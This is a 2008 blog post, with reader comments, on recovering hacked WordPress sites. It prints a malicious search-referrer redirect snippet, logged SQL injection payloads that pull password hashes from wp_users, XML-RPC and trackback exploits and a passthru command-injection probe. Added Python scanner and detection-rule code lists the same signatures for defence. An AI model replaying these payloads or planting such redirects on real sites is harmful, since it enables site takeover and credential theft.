Jun 08 2008

Did your WordPress site get hacked?

Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs? You did upgrade, didn’t you? No? Then it was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.

Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.

In the last week the hackers have started again. There is no zero-day WordPress exploit, and there is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog: those hits are instead being sent to your-needs.info and anyresult.net.

If you’ve been hacked

  1. Upgrade to the latest version of WordPress.
  2. Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
  3. Change your passwords after upgrading and make sure the hacker didn’t create another user.
  4. Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
    define('SECRET_KEY', '1234567890');

Hidden Code

The bad guys are using a number of ways to hide their hacks:

  • The simplest way is hiding their code in your PHP scripts. If your blog directory and files are writable by the webserver then a hacker has free rein to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten, so make sure you double-check those files for any strange code that uses the eval() command or base64_decode(). Here’s a code snippet taken from here:
    <?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");
    $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
    if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?><?php

    Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.

  • Check the .htaccess file in the root of your blog. If you’ve never edited it, it should look like this:
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    # END WordPress

    That file may also contain this chunk, which relates to the uploader:

    <IfModule mod_security.c>
    <Files async-upload.php>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </Files>
    </IfModule>

  • They’re also uploading PHP code disguised as JPEG files to your upload directory and adding those files to the active plugins list. This makes them harder to find, but not impossible:
    1. Open phpMyAdmin, go to your blog’s options table and find the active_plugins record.
    2. Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like ../uploads/2008/05/04/jhjyahjhnjnva.jpg. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again.
    3. Check your uploads directory for that jpg file and delete it.
    4. This YouTube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record, but it won’t hurt to do it.
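As an added example that is not part of the original post, here is a small Python helper for the checks above: it scans a PHP file for the eval()/base64_decode() calls and the k1b0rg/keymachine.de markers the post names, and it parses the PHP-serialized active_plugins value so entries like ../uploads/.../x.jpg can be dropped before the record is written back. The sample footer and active_plugins value are constructed for the demonstration.

```python
import re

# Markers the post says to look for in theme and core PHP files: eval() and
# base64_decode() calls, plus the k1b0rg / keymachine.de strings of the second hack.
SUSPICIOUS = [
    ("eval()", re.compile(r"\beval\s*\(")),
    ("base64_decode()", re.compile(r"\bbase64_decode\s*\(")),
    ("k1b0rg marker", re.compile(r"k1b0rg")),
    ("keymachine.de marker", re.compile(r"keymachine\.de")),
]


def find_suspicious(php_source):
    """Return (line_number, label, excerpt) for every line that matches a marker."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for label, rx in SUSPICIOUS:
            if rx.search(line):
                hits.append((lineno, label, line.strip()[:60]))
    return hits


def parse_serialized_list(blob):
    """Parse a PHP-serialized array of strings (the shape of active_plugins).

    The format stores byte lengths, so the value is handled as bytes:
    a:<count>:{i:<key>;s:<len>:"<bytes>";...}
    """
    if not blob.startswith(b"a:"):
        raise ValueError("not a serialized PHP array")
    end = blob.index(b":", 2)
    count = int(blob[2:end])
    pos = end + 2                        # skip ':{'
    values = []
    for _ in range(count):
        if blob[pos:pos + 2] != b"i:":   # integer key
            raise ValueError("expected integer key at offset %d" % pos)
        pos = blob.index(b";", pos) + 1
        if blob[pos:pos + 2] != b"s:":   # string value
            raise ValueError("expected string value at offset %d" % pos)
        colon = blob.index(b":", pos + 2)
        length = int(blob[pos + 2:colon])
        start = colon + 2                # skip ':"'
        values.append(blob[start:start + length].decode("utf-8"))
        pos = start + length + 2         # skip '";'
    if blob[pos:pos + 1] != b"}":
        raise ValueError("unterminated array")
    return values


def serialize_list(values):
    """Re-serialize with fresh 0-based keys, as WordPress does when plugins are reactivated."""
    parts = [b"a:%d:{" % len(values)]
    for i, value in enumerate(values):
        raw = value.encode("utf-8")
        parts.append(b'i:%d;s:%d:"%s";' % (i, len(raw), raw))
    parts.append(b"}")
    return b"".join(parts)


def clean_active_plugins(blob):
    """Return (cleaned blob, removed entries).

    A legitimate entry is a .php path relative to wp-content/plugins, so anything
    that climbs out of that directory (../uploads/...) or is not a .php file goes.
    """
    keep, removed = [], []
    for entry in parse_serialized_list(blob):
        if ".." in entry or entry.startswith("/") or not entry.endswith(".php"):
            removed.append(entry)
        else:
            keep.append(entry)
    return serialize_list(keep), removed


# Constructed samples: a theme footer carrying the redirect snippet from the post,
# and an active_plugins value with the disguised .jpg entry the post describes.
SAMPLE_FOOTER = """<?php wp_footer(); ?>
<?php $seref=array("google","msn"); $ser=0;
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
</body></html>"""

SAMPLE_ACTIVE_PLUGINS = (
    b'a:3:{i:0;s:19:"akismet/akismet.php";'
    b'i:1;s:39:"../uploads/2008/05/04/jhjyahjhnjnva.jpg";'
    b'i:2;s:9:"hello.php";}'
)

if __name__ == "__main__":
    for lineno, label, excerpt in find_suspicious(SAMPLE_FOOTER):
        print("line %d: %s: %s" % (lineno, label, excerpt))
    cleaned, removed = clean_active_plugins(SAMPLE_ACTIVE_PLUGINS)
    print("removed:", removed)
    print("cleaned:", cleaned.decode())
```

Paste the cleaned value back into the active_plugins record in phpMyAdmin, or simply delete the record and reactivate plugins if the array looks mangled.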

Change Your Passwords

Once you’ve upgraded and verified that your install is clean again you must do the following:

  1. Change the passwords of all users on your system.
  2. Make sure the hacker hasn’t added another user account he can use to login again.

Stop the bad guys

One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).

  • I use BackupPC to back up all my servers every night, and a simple MySQL backup script to dump the database daily.
  • The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. It gives me a daily report on files that have changed in that period, so if a hacker has changed a script or uploaded malicious code I’ll get an email about it within a day. It does take some fine-tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo):

    # apt-get install aide
    # vi /etc/aide/aide.conf.d/88_aide_web
    # /usr/sbin/aideinit

    In the configuration file above I put the following:

    /home/web/ Checksums
    !/home/www/logs/.*
    !/home/web/public_html/wp-content/cache/.*
    !/home/web/.*/htdocs/wp-content/cache/.*

    That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.

Please Upgrade

There is absolutely no reason not to upgrade. WordPress is famous for its 5-minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out-of-date software and use it to their advantage.

Help a friend

Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:

<meta name="generator" content="WordPress 2.5.1" /> <!-- leave this for stats -->

What does a hack look like?

I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.

Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”, which strangely enough doesn’t show up on Google at all right now.

  1. First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
  2. Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
    POST: Array
    (
    [cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
    )

  3. When that fails, he grabs xmlrpc.php.
  4. He then POSTs to that script, exploiting an old and long-fixed bug. Here’s a snippet of the data.
    HTTP_RAW_POST_DATA: <?xml version="1.0"?>
    <methodCall>
    <methodName>system.multicall</methodName>
    <params>
    <param><value><array><data>
    <value><struct>
    <member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
    <member><name>params</name><value><array><data>
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
    </data></array></value></member>

  5. That fails too so the query is repeated with similar SQL.
    <value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>

  6. Then he tries a trackback:
    URL: /wp-trackback.php?tb_id=1
    POST: Array
    (
    [title] => 1
    [url] => 1
    [blog_name] => 1
    [tb_id] => 666666\'
    [1740009377] => 1
    [496546471] => 1
    )

  7. And another trackback:
    URL: /wp-trackback.php?p=1
    POST: Array
    (
    [url] => ekibastos
    [title] => ekibastos
    [excerpt] => ekibastos
    [blog_name] => +AFw-\')/*
    [charset] => UTF-7
    )

  8. Before finally going back to xmlrpc.php with this POST request:
    <?xml version="1.0"?>
    <methodCall>
    <methodName>pingback.ping</methodName>
    <params>
    <param><value><string>k1b0rg' icq: 76-86-20</string></value></param>
    <param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
    <param><value><string>admin</string></value></param>
    </params>
    </methodCall>

  9. In between, he also tries the following GET requests:
    GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
    GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1

  10. Thankfully I upgraded and all those attacks fail.

Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.

PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.

<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
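As an added example, not from the post, the request sequence above and the XML-RPC probe in the PS turned into detection rules over request records. The record fields (ip, method, path, query, user_agent, body) are an assumed shape for whatever request logging you run, the sample requests are constructed from the fragments shown, and the IP addresses are documentation addresses rather than the ones in the post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, unquote_plus

# UNION ... SELECT ... FROM wp_users: the shape of every SQL probe shown in the post.
SQLI_RX = re.compile(r"union\s+(all\s+)?select\b.*\bwp_users\b", re.I | re.S)
# PHP execution functions dropped into an XML-RPC parameter, as in the PS probe.
PHP_EXEC_RX = re.compile(r"\b(passthru|system|exec|shell_exec)\s*\(")


def _decoded(text):
    """URL-decode twice: the post shows %2527, a double-encoded quote."""
    return unquote_plus(unquote_plus(text or ""))


# (rule name, predicate over one request dict); order determines output order.
RULES = [
    ("ekibastos user agent",
     lambda r: "k1b compatible" in r["user_agent"].lower()),
    ("union-select against wp_users",
     lambda r: SQLI_RX.search(_decoded(r["query"]) + " " + _decoded(r["body"])) is not None),
    ("xmlrpc system.multicall",
     lambda r: r["path"].endswith("xmlrpc.php") and "system.multicall" in r["body"]),
    ("php code in xmlrpc value",
     lambda r: r["path"].endswith("xmlrpc.php") and PHP_EXEC_RX.search(r["body"]) is not None),
    ("utf-7 trackback",
     lambda r: r["path"].endswith("wp-trackback.php")
     and ("utf-7" in r["body"].lower() or "+AFw-" in unquote(r["body"]))),
    ("HEAD probe of wp-admin/post.php",
     lambda r: r["method"] == "HEAD" and r["path"].endswith("wp-admin/post.php")),
]


def classify(request):
    """Return the names of every rule a single request trips, in RULES order."""
    return [name for name, check in RULES if check(request)]


def summarize(requests):
    """Group rule hits per client IP so one bot's whole sequence shows up together."""
    per_ip = defaultdict(list)
    for r in requests:
        per_ip[r["ip"]].extend(classify(r))
    return {ip: hits for ip, hits in per_ip.items() if hits}


# Constructed traffic: one bot running the post's sequence (192.0.2.10), the xmlrpc
# passthru probe from the PS (198.51.100.7) and an ordinary visitor (203.0.113.5).
K1B_UA = "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
SAMPLE_REQUESTS = [
    dict(ip="192.0.2.10", method="HEAD", path="/wp-admin/post.php", query="",
         user_agent=K1B_UA, body=""),
    dict(ip="192.0.2.10", method="POST", path="/xmlrpc.php", query="", user_agent=K1B_UA,
         body="<methodName>system.multicall</methodName><value><string>"
              "http://example.com/category/&post_type=%27) UNION ALL SELECT 10048,2,3 "
              "FROM wp_users WHERE ID=1%2F*</string></value>"),
    dict(ip="192.0.2.10", method="POST", path="/wp-trackback.php", query="p=1",
         user_agent=K1B_UA,
         body="url=ekibastos&title=ekibastos&blog_name=%2BAFw-%5C%27)/*&charset=UTF-7"),
    dict(ip="192.0.2.10", method="GET", path="/index.php",
         query="cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58)),"
               "null,null,null+FROM+wp_users+where+id=1/*",
         user_agent=K1B_UA, body=""),
    dict(ip="198.51.100.7", method="POST", path="/xmlrpc.php", query="",
         user_agent="Mozilla/5.0",
         body="<methodName>test.method</methodName><param><value><name>','')); echo "
              "'______BEGIN______'; passthru('id'); exit;/*</name></value></param>"),
    dict(ip="203.0.113.5", method="GET", path="/", query="", user_agent="Mozilla/5.0", body=""),
]

if __name__ == "__main__":
    for ip, hits in summarize(SAMPLE_REQUESTS).items():
        print(ip, "->", ", ".join(hits))
```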

Edit: Tripwire URL fixed, thanks Callum

PS. If your site has been hacked, try the WordPress Exploit Scanner, which will try to find any modified files and suspicious database records.


268 Comments »

  • Greg says:

    Thanks. I checked the server version of the index.php file in the default themes folder, and it has not been modified since two weeks ago, so that should rule it out. I uploaded the one from my local machine to write over it just to be sure. I also reviewed all the modification dates of every non database file on the remote server, and nothing was modified since the search string hack attempt I posted. If you can think of anything else, please let me know. And in any event, thanks for the fast reply and the help. Greg

  • [...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress developer. In the meantime, I’ll be busy backing [...]

  • [...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress [...]

  • [...] Googling a number of times, I found this post which I think explains what happened to my site. I tried updating to the newest version but still, [...]

  • Malicious says:

    I just wanted to add that in many cases it’s good to have a second layer of protection that includes the protection of the plugins etc.
    I strongly recommend phpids for this, it’s software for php 5.2.x that protects scripts against almost all sql injections and xss attacks;)
    Regards,
    Malicious

  • [...] for blog, ftp and database. For other WordPress bloggers I would recommend taking a look at this post. (Thanks to Kristin for the link via [...]

  • general fuzz says:

    Thank you very much for making this post! It was very helpful.

  • JBacchi says:

    Thanks for the great content! I had to go through my entire database, post by post to find the hidden iframes code the hacker left behind!

    Hopefully now I have resolved the problem. Thanks again.

  • carlos bastidas says:

    I am a perfect n00b and my group of blogs were hacked. I was using on them all WordPress 2.7 and I had long passwords like: Uh5″ôD$id?!MS) but it was hacked yesterday and I am still trying to make them work. My hosting company midphase.com helped me to get one of ‘em online and running but the others remain hacked: miautoculiacan.com the content is there and I can enter the admin panel with my password and I am just trying to understand everything. My .htaccess reads like this:
    # -FrontPage-

    IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*

    order deny,allow
    deny from all
    allow from all

    order deny,allow
    deny from all

    AuthName http://www.internetpymes.com
    AuthUserFile /home/intebas7/public_html/_vti_pvt/service.pwd
    AuthGroupFile /home/intebas7/public_html/_vti_pvt/service.grp
    # BEGIN WordPress

    # END WordPress

    Where do I keep looking? Am I in the right direction?

  • timbearcub (Tim Baker) says:

    Digital Debris is all fixed – nightmare though, I really recommend this if it ever happens to you http://is.gd/eV4F in fact check now

  • [...] like here or here. Or there is another, more complete tutorial for a slightly different case here, or a reference from the ShoeMoney blog with an almost similar case here, and others of course at [...]

  • [...] those of you who want more: Read an interesting article about a Wordpress blog being [...]

  • [...] installs : If you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]

  • [...] Click here to read post [...]

  • Paris Lia says:

    Yes, my custom hosted wordpress blog was hacked back in 2007. Talk about heartbreak – I got my first writing job based on that blog!

    I’m tentatively back on the wordpress train but only on wordpress.com which points to my own domain name.

  • Stef says:

    Recently started up a blog and was happy when I started getting listed on google and seeing referrals coming there. Then as quickly as the search results came they disappeared. I noticed googlebot indexing my site last night. Are these fluctuations normal on a new website? I have checked my site for the problems you mention here and it appears to be clean with the latest version of wordpress installed. Thanks for the information and great blog by the way!

  • [...] Update 17-03-09: All the problems have been fixed. In the end it was NOT a WordPress flaw; rather, another of the people who share the server with us installed some kind of application of dubious security, and most likely that allowed the server to be accessed and malicious code to be added to many of the php files of my WordPress installation. The solution to all this was provided to me in the thread I opened on the WordPress technical support forum, so I leave the link here for anyone it may help in case they have suffered this same attack. Specifically, the site that provides the solutions is: http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]

  • [...] BlogSecurity is a blog that provides information about maintaining Wordpresss Security. Holy Shmoly has a great blog post entitled “Did your Wordpress Blog Get Hacked?” and it provides a [...]

  • [...] my sites: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” and “Did your WordPress site get hacked?”, rather [...]

  • [...] this was quite a challenging task as I wasn’t sure what or where to look. I found this article which gave a few pointers. I have yet to follow all the instructions but this is what I’ve [...]

  • gillestoubiana (gilles toubiana) says:

    Reading: Holy Shmoly! » Did your WordPress site get hacked? http://tinyurl.com/4orj9h

  • LisaMarieArt (LisaMarieArt) says:

    @Veneficusunus has your wordpress installation been hacked http://tinyurl.com/4orj9h

  • kriptontr (Tamer Aktaş) says:

    a vulnerability in wordpress 2.7.1 too? http://tinyurl.com/de2pl2 http://tinyurl.com/4orj9h

  • [...] First download the latest version of wordpress and replace the system files with fresh ones. Then clean the malicious code out of the files added later (themes, plugins and the like). Change all your passwords, starting with the ones most closely tied to your website. Learn to generate strong and usable passwords. This is a bit ironic, but keep your Windows secure. Luckily this did not happen only to me. If you are facing this situation too, you may find the links below useful: http://wordpress.org/support/topic/263085 http://wordpress.org/support/topic/261886 http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]

  • [...] You can read more about .htaccess from here. I checked my blog and it was working fine. CallingAllGeeks was up and running again. So, in all it [...]

  • Jayapal Chandran says:

    Hi, I created a sub folder on my server to test wordpress. It was just 10 days and then some files in that folder were deleted, except the wp_content folder, wp_includes folder and wp_register.php… also some of the other folders and files were deleted in the root folder. Will a wordpress hack delete files other than the wordpress files??? Also the files are in read/write mode. So :-(

  • Casper says:

    Some great information here, many thanks to all.

    I do try to keep up with the latest versions on all my sites, including plugins, but have to admit that i’m sometimes a bit irregular with my backups.

    Luckily, everytime i’ve been hacked (about 30 times across 40 sites in the last 12 months), no damage has been done.

    Thanks again for the tips.

  • Jay Versluis says:

    Darn,

    I’ve been hacked with 2.6.5 last year, and just recently with 2.7 on a couple of my sites. It’s extremely annoying, as those were ones on shared hosting packages that don’t let me upgrade automatically. It’s pure laziness on my part that I didn’t do it, all my other sites are 2.7.1 and don’t have a problem.

    Note to self: UPGRADE

    Other Note to self: once you’re done editing theme and plugin files, set file permissions back to 755 for god’s sake!

    Thanks for the article ;-)

  • ravi says:

    this is a cool background. is it jQuery based theme ? sorry to bother

  • [...] be on your blog, you can go through this list. If you want to know how a hacker works, this page is quite a good read, though very [...]

  • [...] enough as we’re all vulnerable here. If you’re more tech savvy, here’s a post by Holy Shmoly! which tacles hacked php scripts on WordPress and how they look [...]

  • [...] Open source Exploits The open source platforms are now an easy target for hackers to exploit and use the malicious codes. The last thing that we need is a hacked site with a very good SERP. If you are interested in a serious article this is the place to go. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]

  • [...] spam. I am not sure I have cleaned everything that needed cleaning. But I did what I could. Here is more information to check whether you have the same problem. (Not you Javi, I already confirmed you didn’t have the same [...]

  • [...] Well, it was clearly bad news: the site ajaxplorer.info was hacked on the 13 July 2009, naturally just the night before an important gig, so I had to take it down for a few days. But the good news is that it had nothing to do with the AjaXplorer installed on the server; it was a wordpress security problem. My fault, I had not updated the wordpress install, and I will right now subscribe to the wordpress rss feed urging you to upgrade when they find a problem. For those using wordpress, have a look here if you haven’t updated already: http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]

  • Justin Souter says:

    Check out http://wordpress.org/support/topic/307588 – someone had changed my permalinks set-up. Need to do a thorough check-up on everything else… http://codex.wordpress.org/Hardening_WordPress is my next port of call.

  • Mike says:

    We also got hit :-(

    Our press release section got screwed over by the hacker.

    We did also think about the issue of restoring your permalinks, and the need to do them EXACTLY as they were in the past, to avoid loss of search engine results, and possibly traffic… Most people have easy to remember permalinks, but for people that don’t, and who are silly enough not to have the structure backed up (cough) then here is a guide: http://www.kingpin-seo.co.uk/press-releases/how-to-recover-your-permalinks-settings-to-get-your-indexed-posts-back-dont-loose-google-serps/116611

    Hope you don’t mind me linking to it! – Not trying to spam you guys, just trying to help bloggers avoid SERP loss.

  • [...] Found another older post, but more good suggestions there. For example, I did review my .htaccess file and found it a bit [...]

  • [...] this hack news from June 2008 or March 2007 But this news .. news .. news .. news [...]

  • [...] recently, I followed some of the steps mentioned by Jaypee, Donncha O Caoimh and the WP [...]

  • Glenn Haggard says:

    Great info! Thanks for the information. Fortunately, I upgraded before being hacked. However, there are some best practices that I need to update my site with.

    BTW…love the WP-Supercache plugin. Thanks!!!

  • Cassie says:

    I may have been hacked, at the very least I had people add themselves as users, never got to the ADMIN point I think, but I did find this in my php code… I use the revolution theme… and am not sure if this should be there or not.

    There doesn’t appear to be anything wrong with the site or pages but here is the code:

    SELECT *
    FROM `DatabasenameXXXXXXXXXXXX`.`wp_options`
    WHERE (
    `option_id` LIKE '%base64_decode%'
    OR `blog_id` LIKE '%base64_decode%'
    OR `option_name` LIKE '%base64_decode%'
    OR `option_value` LIKE '%base64_decode%'
    OR `autoload` LIKE '%base64_decode%'
    )
    LIMIT 0 , 30

    Am I ok.. or did something happen?

  • Think CONTRA says:

    Great piece! Looks like I was hacked today! I’ve upgraded to the new WP but the problem I’m having is that when I go to admin – posts – it tells me there are no posts found – but the numeric line above it states that there are posts. My categories are also missing.

    Any suggestions as to where to look? Please help!!!!!!

    Thanks,

  • ro says:

    Hi there :)) Looking desperately for help :) I cannot even get into my blog b/c the worm or whatever has deleted my admin user and now all my posts are gone etc. How do I even get back into my blog to delete the hacker user and start to clean up. Do I do this from FTP? Do I upgrade first? And where exactly do I look for these codes (through my cpanel) or do I go into my blog admin and look at code there? I have a prophoto2 theme blog. Thank you so much. I am worried that the virus will not stop and eat up my whole blog – it is still there for now with header etc, just no posts. Can you please help me?? I’d be so grateful. Thank you :))

  • Lyon says:

    My wordpress blog was hacked too, my permalink structure was default but it changed to a funky one when it was hacked by this worm, and a pretty simple fix is to click the default permalink structure again and click save changes, now your posts should be working again, mine started working again.

    I admit, i had to upgrade my blog for many months, but i am too lazy for some things sometimes, but not anymore, now i got smarter, way smarter to be hacked again.

  • doruman says:

    Thank you for all this useful information. Unfortunately it`s a matter of time until a Wordpress blog will be attacked by hackers, in a form or other. The main rule is a constant DB backup. Upgrade your WP and the plugins when it`s possible, try to protect as much as you can, in this article you can find useful details, but don`t forget, secure your important data by regular backups.

  • Lyon says:

    For the sake of helping of course, i want to say something else.

    When i was hacked, i mentioned that my permalink structure was hacked, it was literally changed to a very complex one, fortunately it was not working in terms of real and active links, i guess the hacker who wrote the worm did not want to make damage, real and extensive damage i mean, i guess he wanted only to scare people into upgrading your wordpress blog which makes me think a lot, i mean, who would want to scare every wordpress blog user in to upgrading to the latest patch!!!?

    But the permalink structure hacked was not all, my theme files were hacked too, my footer php file was hacked, they inserted a large number of links to spam stuff, which by the way, really damaged my google search engine position and perhaps even my page rank position too, in the long run of course, and that happened because the guy used a very common flaw everyone does, and wordpress has fault on that, i explain in the next paragraph.

    If you go to the theme editor in the appearance menu, you know or you should know that you can edit your theme files or any other file from your wordpress installation on your wordpress control panel appearance online editor, and for that, you must first change mod the file permissions of the files you want to edit, i mean, change to be writable so that the online wordpress file editor can edit, but that is a major flaw because nobody will change mode the files permissions again to what value they were with, and with a XSS attack or some xmlrpc trackback attack method, hackers could create worms or just pieces of code to insert malware code into the files you just changed permissions to writable.

    Another flaw people still use in wordpress blogs and others is the XMLRPC protocol, that must be deleted from blogs, it is so insecure that it is just another flaw that hackers use to hack or deface a wordpress blog, so the main patch is for you to delete the xmlrpc.php file from your wordpress root installation directory, believe me, i really informed myself on this, delete it and deactivate the service by going to the wordpress control panel, then in general options in some menu i can not recall the name, just browse through all and set it off, you do not need that.

    Hope i helped.

  • [...] Did your Wordpress site get hacked? [...]

  • kevin says:

    Someone changing my urls like

    Original URLs were
    http://mydomain.com/2009/08/14/my-post/

    changed url
    mydomain.com/?p=68

    Please advise how to prevent this

  • James says:

    Several of my sites were exploited by a hacker recently. As far as I am aware the hack used the wordpress php vulnerability to gain access to my server and, rather than creating havoc with wordpress files, appears to have defaced one of my html sites by deleting the home page and uploading his or her own stupid home page. So, in this case they used wordpress to gain entry but did not do anything other than deface an unrelated non-wordpress site. Upgraded wordpress, all plugins and installed a firewall which seems to be doing its job of blocking further attacks given the emails I get from them once a week stating I have again fallen victim! Changed all passwords, ftp, admin, sql and any other I could think of! It really is not nice being hacked and is a real pain in the rear, so ensure you back up often and install a firewall – if you have one they will simply move on to another blog which does not, so it’s a good deterrent.

  • kevin says:

    Someone changing my urls like

    Original URLs were
    http://mydomain.com/2009/08/14/my-post/

    changed url
    mydomain.com/?p=68

    How they changed it…any clue

  • Wordy says:

    As a JustHost user I installed WordPress (previous version) as first time user, via cPanel – Fantastico.

    Everything worked well, upgraded immediately for WP 2.8.4 security upgrade via WP Dashboard, which subsequently displayed WordPress 2.8.4.

    Henceforth, I thought I was running with WP 2.8.4.

    That is, until yesterday!

    cPanel – Fantastico | WordPress

    displayed in RED upgrade now to WP 2.8.4

    Shock horror!

    Install by Fantastico and it controls WordPress.

    Upgrades by WP Wordpress do not update.

    Warning:

    WordPress upgrades – immediate.

    Fantastic WP upgrades – timing delay, therefore, security risk.

    My site been hacked.

  • mixos says:

    I found the following injected code on my wordpress theme footer.php

    if (!isset($_COOKIE["tll"])) echo "";

  • [...] How To Completely Clear Your Hacked WordPress Installation Hardening WordPress Did Your WordPress Site Get Hacked? 20 WordPress Security Plugins (don’t overdo it, though) Share this on del.icio.usDigg this!Share [...]

  • rosacea says:

    My site and blog were also hacked by the latest wordpress worm. It’s important to also look in your sql database, particularly in the wp_users category: if you’re the only admin, there should only be records that pertain to you (tagged with “1″); all others should be deleted. Also check the users meta data: this is where I found a JS file that contained hidden redirect code. Another place is the “uploads” folder: you may find a cached javascript file that shouldn’t be there, or a tinymce.gz file: delete both. Check your blog/database daily after you install a clean copy to make sure it stays clean.

    • Lisa Lubin says:

      Thank you so much for this article. I’ve recently been hacked with HIDDEN Spam links in my header.
      I did find a bunch of ‘fake’ users in my Users file in myPHPadmin and deleted them.
      Then i changed my WP name/password.
      But the links came back a week later.
      Now i see a bunch of suspicious stuff in my Users Metadata file in myphpadmin.
      ROSACEA:
      How do i know what is safe to delete??
      I feel like I am flying blind.

      Any other tips will be appreciated.

      • Donncha says:

        Run the exploit scanner plugin to find the backdoor that has been installed on your system!

        • Lisa Lubin says:

          Hi Donncha-
          Thank you SO much for replying to me. SO even though i keep deleting these hidden links from my header.php and then re upload the original header.php and i’ve changed usernames and passwords for both WP and Blue host…the hidden links keep returning!!!

          I’ve also deleted fake users and some odd user metadata.
          Now, i ran your Exploit Plug in and this:
          <?php eval(gzinflate(base64_decode('1VVtT9swEP7c/…
          …plus a bunch of script comes up in what appears to be every plug in.

          It also found so many other things: (eval…display: none;…<iframe)…String.fromCharCode) i don't know what's okay and what is not. I am no expert. Please help. What do i do next? Thank you so much!!
          Lisa

  • [...] you think you’ve been hacked, I’ve spotted a couple of useful guides to dealing with the aftermath. Wordpress, php hack, php, security, [...]
